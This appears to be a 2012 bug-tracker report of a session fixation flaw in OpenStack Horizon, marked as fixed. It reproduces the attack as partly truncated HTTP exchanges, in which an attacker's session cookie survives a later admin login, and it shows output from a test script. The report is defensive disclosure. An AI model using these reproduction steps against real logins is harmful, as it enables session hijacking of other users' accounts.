session fixation vulnerability
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Dashboard (Horizon) |
Fix Released
|
Critical
|
Paul McMillan | ||
Essex |
Fix Released
|
Critical
|
Paul McMillan |
Bug Description
Hi,
it looks like openstack-dashboard is vulnerable to a session fixation attack. Here is a HTTP dialog:
1. eviled Login with no Cookie header
-------
POST http://
User-Agent: Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.10.229 Version/11.61
Host: test
Accept: text/html, application/
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;
Accept-Encoding: gzip, deflate
Referer: http://
Cookie: csrftoken=
sessionid=
Proxy-Connection: Keep-Alive
Content-length: 141
Content-Type: application/
csrfmiddlewaret
2. eviled gets response with sessionid Cookie
-------
HTTP/1.1 302 FOUND
Date: Wed, 21 Mar 2012 15:59:09 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Vary: Accept-
Location: http://
Content-Language: en
Set-Cookie: sessionid=
Content-length: 0
Connection: close
Content-Type: text/html; charset=utf-8
3. eviled logout
-----------------
GET http://
User-Agent: Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.10.229 Version/11.61
Host: test
Accept: text/html, application/
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;
Accept-Encoding: gzip, deflate
Referer: http://
Cookie: sessionid=
csrftoken=
Pragma: no-cache
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
4. Admin Login:
---------------
GET http://
User-Agent: Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.10.229 Version/11.61
Host: test
Accept: text/html, application/
image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: de-DE,de;
Accept-Encoding: gzip, deflate
Referer: http://
Cookie: sessionid=
csrftoken=
Pragma: no-cache
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
5. Admin request sets the same CSRF token and sessionid Cookie
-------
HTTP/1.1 200 OK
Date: Wed, 21 Mar 2012 15:59:13 GMT
Server: Apache/2.2.12 (Linux/SUSE)
Vary: Cookie,
Content-Language: en
Set-Cookie: csrftoken=
20-Mar-2013 15:59:13 GMT; Max-Age=31449600; Path=/
Set-Cookie: sessionid=
Connection: close
Content-Type: text/html; charset=utf
CVE References
Changed in horizon: | |
milestone: | none → folsom-1 |
status: | Confirmed → Fix Committed |
Changed in horizon: | |
status: | Fix Committed → Fix Released |
Changed in horizon: | |
milestone: | folsom-1 → 2012.2 |
The following output is from the owasp.pl tool of my test-suite [1].
thomas: ~/test- suite> ./owasp.pl output=short openstack_ horizon_ lpd978896. ini
[...removed output for session_ fixation_ public( )...]
DBG: 003::session_ fixation_ private(http:// test:80/ auth/login/, Login&username= admin&password= openstack) Login&username= eviled& password= eviled' 003::session_ fixation_ private: cookie = a917fb9e5c35b03 b690aa24ed1815a 16; Path=/' Login&username= admin&password= openstack' 003::session_ fixation_ private: session cookie = a917fb9e5c35b03 b690aa24ed1815a 16; Path=/' 003::session_ fixation_ private: new cookie = a917fb9e5c35b03 b690aa24ed1815a 16; Path=/' 003::session_ fixation_ private: logged out 003::session_ fixation_ private: CWE-384 (Session Fixation): code test:80/ auth/login/ )')
OWASP_SM_
POST, method=
DBG: 1. try to login with 'method=
(attacker)
DBG: OWASP_SM_
'sessionid=
DBG: 2. try to login with 'method=
(victim)
DBG: OWASP_SM_
'sessionid=
DBG: OWASP_SM_
'sessionid=
DBG: 3. compare cookie 'sessionid'
DBG: OWASP_SM_
=====> OWASP_SM_
= 1 (msg = 'FAIL:Vulnerable to Session Fixation Attack by authenticated users
(http://
2 tests in 2 secs.
[1] https:/ /gitorious. org/test- suite/test- suite